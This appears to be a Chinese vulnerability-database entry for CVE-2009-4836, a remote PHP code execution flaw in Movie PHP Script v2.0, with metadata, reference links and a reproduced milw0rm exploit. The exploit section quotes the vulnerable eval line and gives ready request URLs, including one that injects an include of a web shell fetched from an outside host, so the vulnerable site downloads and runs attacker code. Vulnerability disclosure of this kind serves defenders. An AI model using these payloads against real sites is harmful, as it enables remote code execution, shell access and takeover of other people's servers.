Movie PHP Script 'system/services/init.php' Eval注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117897 漏洞类型 代码注入
发布时间 2009-06-03 更新时间 2009-06-03
CVE编号 CVE-2009-4836 CNNVD-ID CNNVD-201005-052
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8871
https://www.securityfocus.com/bid/44452
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201005-052
|漏洞详情
MoviePHPScript的system/services/init.php存在Eval注入漏洞,远程攻击者可以通过anticode参数执行任意PHP代码。
|漏洞EXP
#################################################################################################################
[+] Movie PHP Script v2.0 Remote PHP Code Execution
[+] Discovered By SirGod 
[+] www.mortal-team.org
#################################################################################################################

[+] Remote PHP Code Execution

  - Vulnerable code in  system/services/init.php :

---------------------------------------------------------------------------------
Line 84 : @eval(stripslashes($_REQUEST['anticode']));
---------------------------------------------------------------------------------

- PoC : 

    http://127.0.0.1/[path/]system/services/init.php?anticode=[YOUR PHP CODE]

- Example : 

   http://127.0.0.1/path/system/services/init.php?anticode=include "http://www.darkmindz.com/shell/x2300_mod.txt";

- Example 2 :

  http://127.0.0.1/path/system/services/init.php?anticode=phpinfo();

#################################################################################################################

# milw0rm.com [2009-06-03]
|参考资料

来源:VUPEN
名称:ADV-2009-1495
链接:http://www.vupen.com/english/advisories/2009/1495
来源:MILW0RM
名称:8871
链接:http://www.milw0rm.com/exploits/8871
来源:SECUNIA
名称:35283
链接:http://secunia.com/advisories/35283
来源:OSVDB
名称:54883
链接:http://osvdb.org/54883